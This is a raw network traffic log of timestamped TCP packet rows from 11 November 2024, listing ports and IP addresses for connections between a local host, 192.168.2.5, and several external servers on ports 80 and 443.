Nov 11, 2024 10:33:24.632011890 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.632098913 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632110119 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632123947 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632134914 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632136106 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.632137060 CET	443	49823	20.1.248.118	192.168.2.5
Nov 11, 2024 10:33:24.632148027 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632158995 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632167101 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.632169962 CET	443	49823	20.1.248.118	192.168.2.5
Nov 11, 2024 10:33:24.632172108 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632184029 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632194042 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632205963 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632206917 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.632219076 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632225990 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.632230997 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632237911 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632249117 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632253885 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.632260084 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632261038 CET	49823	443	192.168.2.5	20.1.248.118
Nov 11, 2024 10:33:24.632272005 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632276058 CET	443	49823	20.1.248.118	192.168.2.5
Nov 11, 2024 10:33:24.632277966 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.632286072 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632297039 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632308006 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632309914 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.632319927 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.632329941 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.632344007 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.632369995 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.635848045 CET	49838	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:24.635862112 CET	443	49838	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:24.636234999 CET	49838	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:24.637558937 CET	49838	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:24.637573004 CET	443	49838	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:24.637834072 CET	49823	443	192.168.2.5	20.1.248.118
Nov 11, 2024 10:33:24.637871981 CET	443	49823	20.1.248.118	192.168.2.5
Nov 11, 2024 10:33:24.637942076 CET	49823	443	192.168.2.5	20.1.248.118
Nov 11, 2024 10:33:24.663008928 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.663037062 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.663053036 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.663117886 CET	49824	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.663132906 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.663188934 CET	49824	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.685976028 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.685995102 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.686018944 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.686034918 CET	49824	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.686042070 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.686095953 CET	49824	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.688283920 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.688308001 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.688323021 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.688385010 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.688395023 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.688421965 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.688474894 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.695230007 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.695256948 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.695297956 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.695302963 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.695327997 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.695350885 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.695863962 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.744266987 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.744288921 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.744355917 CET	49824	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.744363070 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.766849041 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.766870022 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.766901970 CET	49824	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.766910076 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.766952991 CET	49824	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.767862082 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.767925978 CET	49824	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.769767046 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.769790888 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.769845963 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.769855976 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.769891024 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.770395994 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.770411968 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.770482063 CET	49824	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.770488024 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.776294947 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.776324034 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.776365995 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.776376009 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.776412964 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.777026892 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.777112961 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.777118921 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.778393984 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.778422117 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.778470993 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.778479099 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.778518915 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.801234961 CET	443	49828	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:24.801341057 CET	443	49829	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:24.825081110 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.825124025 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.825145006 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.825145006 CET	49824	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.825192928 CET	49824	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.831641912 CET	49828	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:24.831650972 CET	443	49828	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:24.832853079 CET	443	49828	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:24.832928896 CET	49828	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:24.834237099 CET	49829	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:24.834264040 CET	443	49829	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:24.835529089 CET	443	49829	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:24.835597038 CET	49829	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:24.839989901 CET	49824	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.850204945 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.850229979 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.850332022 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.850332022 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.850347996 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.850508928 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.850538969 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.850572109 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.850572109 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.850579977 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.850593090 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.850672007 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.857328892 CET	49825	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.857337952 CET	443	49825	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.863079071 CET	49824	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.863095045 CET	443	49824	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.869102001 CET	49828	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:24.869194984 CET	49829	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:24.869218111 CET	443	49828	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:24.869285107 CET	443	49829	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:24.893577099 CET	443	49826	204.79.197.219	192.168.2.5
Nov 11, 2024 10:33:24.899518967 CET	49826	443	192.168.2.5	204.79.197.219
Nov 11, 2024 10:33:24.899528027 CET	443	49826	204.79.197.219	192.168.2.5
Nov 11, 2024 10:33:24.901010036 CET	443	49826	204.79.197.219	192.168.2.5
Nov 11, 2024 10:33:24.901087046 CET	49826	443	192.168.2.5	204.79.197.219
Nov 11, 2024 10:33:24.903054953 CET	443	49830	204.79.197.219	192.168.2.5
Nov 11, 2024 10:33:24.903847933 CET	49830	443	192.168.2.5	204.79.197.219
Nov 11, 2024 10:33:24.903862000 CET	443	49830	204.79.197.219	192.168.2.5
Nov 11, 2024 10:33:24.904016018 CET	49826	443	192.168.2.5	204.79.197.219
Nov 11, 2024 10:33:24.904133081 CET	443	49826	204.79.197.219	192.168.2.5
Nov 11, 2024 10:33:24.904942036 CET	443	49830	204.79.197.219	192.168.2.5
Nov 11, 2024 10:33:24.905004025 CET	49830	443	192.168.2.5	204.79.197.219
Nov 11, 2024 10:33:24.917845964 CET	49830	443	192.168.2.5	204.79.197.219
Nov 11, 2024 10:33:24.918001890 CET	443	49830	204.79.197.219	192.168.2.5
Nov 11, 2024 10:33:24.939349890 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:24.945379972 CET	443	49833	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.945496082 CET	443	49832	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.947143078 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:24.947159052 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:24.948156118 CET	49833	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.948188066 CET	443	49833	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.948276043 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:24.948369980 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:24.949352980 CET	49833	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.949359894 CET	443	49833	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.949776888 CET	49832	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.949790955 CET	443	49832	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.950531960 CET	49832	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.950536966 CET	443	49832	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.951598883 CET	49839	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:24.951638937 CET	443	49839	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:24.951746941 CET	49839	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:24.952131033 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.952142954 CET	49839	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:24.952157021 CET	443	49839	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:24.953347921 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:24.953424931 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:24.953665972 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:24.953674078 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:24.956876993 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.958599091 CET	443	49834	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.959310055 CET	49834	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.959322929 CET	443	49834	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.959631920 CET	443	49835	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.960472107 CET	443	49836	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.963320971 CET	49834	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.963325024 CET	443	49834	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.965956926 CET	49835	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.965972900 CET	443	49835	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.966602087 CET	49835	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.966607094 CET	443	49835	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.967077017 CET	49836	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.967094898 CET	443	49836	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.967518091 CET	49836	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.967523098 CET	443	49836	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.968699932 CET	443	49837	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:24.968915939 CET	49837	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:24.968924046 CET	443	49837	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:24.969300985 CET	443	49837	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:24.969366074 CET	49837	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:24.970032930 CET	443	49837	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:24.970110893 CET	49837	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:24.971144915 CET	49837	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:24.971210957 CET	443	49837	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:24.971354008 CET	49837	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:24.971360922 CET	443	49837	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:24.971376896 CET	49837	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:24.991967916 CET	49829	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:24.991986036 CET	443	49829	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:24.992017031 CET	49830	443	192.168.2.5	204.79.197.219
Nov 11, 2024 10:33:24.992032051 CET	443	49830	204.79.197.219	192.168.2.5
Nov 11, 2024 10:33:25.019337893 CET	443	49837	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:25.020581961 CET	49822	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:25.020627975 CET	49821	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:25.020674944 CET	443	49821	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:25.020689011 CET	443	49822	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:25.020729065 CET	49821	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:25.020762920 CET	49822	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:25.022486925 CET	49794	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:25.022543907 CET	443	49794	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:25.022638083 CET	49794	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:25.022759914 CET	49795	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:25.022802114 CET	49796	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:25.022816896 CET	443	49795	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:25.022860050 CET	443	49796	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:25.022886038 CET	49795	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:25.022907972 CET	49796	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:25.022989988 CET	49797	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:25.023036003 CET	49838	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.023049116 CET	443	49797	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:25.023070097 CET	49828	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:25.023078918 CET	443	49828	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:25.023102045 CET	49797	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:25.023128986 CET	49828	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:25.023426056 CET	49829	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:25.023463964 CET	49826	443	192.168.2.5	204.79.197.219
Nov 11, 2024 10:33:25.023475885 CET	443	49826	204.79.197.219	192.168.2.5
Nov 11, 2024 10:33:25.023499966 CET	49830	443	192.168.2.5	204.79.197.219
Nov 11, 2024 10:33:25.023505926 CET	443	49829	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:25.023520947 CET	49826	443	192.168.2.5	204.79.197.219
Nov 11, 2024 10:33:25.023551941 CET	443	49830	204.79.197.219	192.168.2.5
Nov 11, 2024 10:33:25.023556948 CET	49829	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:25.023617983 CET	49830	443	192.168.2.5	204.79.197.219
Nov 11, 2024 10:33:25.023974895 CET	49839	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:25.024394035 CET	49840	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:25.024424076 CET	443	49840	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:25.024636030 CET	49840	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:25.024645090 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.024660110 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.024827003 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.024991035 CET	49840	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:25.025006056 CET	443	49840	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:25.025130987 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.025150061 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.040008068 CET	443	49832	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.040016890 CET	443	49833	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.040060997 CET	443	49833	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.040060997 CET	443	49832	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.040112972 CET	49832	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.040287971 CET	49833	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.051939011 CET	443	49834	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.052025080 CET	443	49834	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.052105904 CET	49834	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.055157900 CET	49832	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.055167913 CET	443	49832	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.055177927 CET	49832	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.055182934 CET	443	49832	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.055605888 CET	443	49835	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.055697918 CET	443	49835	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.055742979 CET	49835	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.055906057 CET	443	49836	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.056042910 CET	443	49836	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.056096077 CET	49836	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.057116032 CET	49835	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.057128906 CET	443	49835	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.057140112 CET	49835	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.057148933 CET	443	49835	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.062446117 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.063337088 CET	443	49838	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.067342043 CET	443	49839	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:25.082266092 CET	49836	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.082283020 CET	443	49836	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.088372946 CET	49833	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.088388920 CET	443	49833	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.088402033 CET	49833	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.088407040 CET	443	49833	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.089951992 CET	49834	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.089957952 CET	443	49834	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.089968920 CET	49834	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.089972973 CET	443	49834	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.096637964 CET	49842	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.096662045 CET	443	49842	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.096793890 CET	49842	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.104412079 CET	49843	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.104427099 CET	443	49843	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.104497910 CET	49843	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.106389046 CET	49844	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.106412888 CET	443	49844	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.106471062 CET	49844	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.106868982 CET	49842	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.106882095 CET	443	49842	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.111414909 CET	49845	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.111429930 CET	443	49845	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.111486912 CET	49845	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.111994028 CET	49845	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.112005949 CET	443	49845	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.122102022 CET	49843	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.122112036 CET	443	49843	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.122379065 CET	49844	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.122400045 CET	443	49844	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.122631073 CET	49846	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.122642040 CET	443	49846	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.122728109 CET	49846	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.122915030 CET	49846	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.122927904 CET	443	49846	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.151036024 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151073933 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151139975 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.151375055 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151420116 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151441097 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.151492119 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.151518106 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151531935 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151541948 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151555061 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151559114 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.151571989 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.151583910 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151595116 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151603937 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.151607990 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151619911 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151635885 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.151643991 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151660919 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151669025 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.151674032 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151685953 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151696920 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.151715994 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.151726007 CET	49747	80	192.168.2.5	185.215.113.206
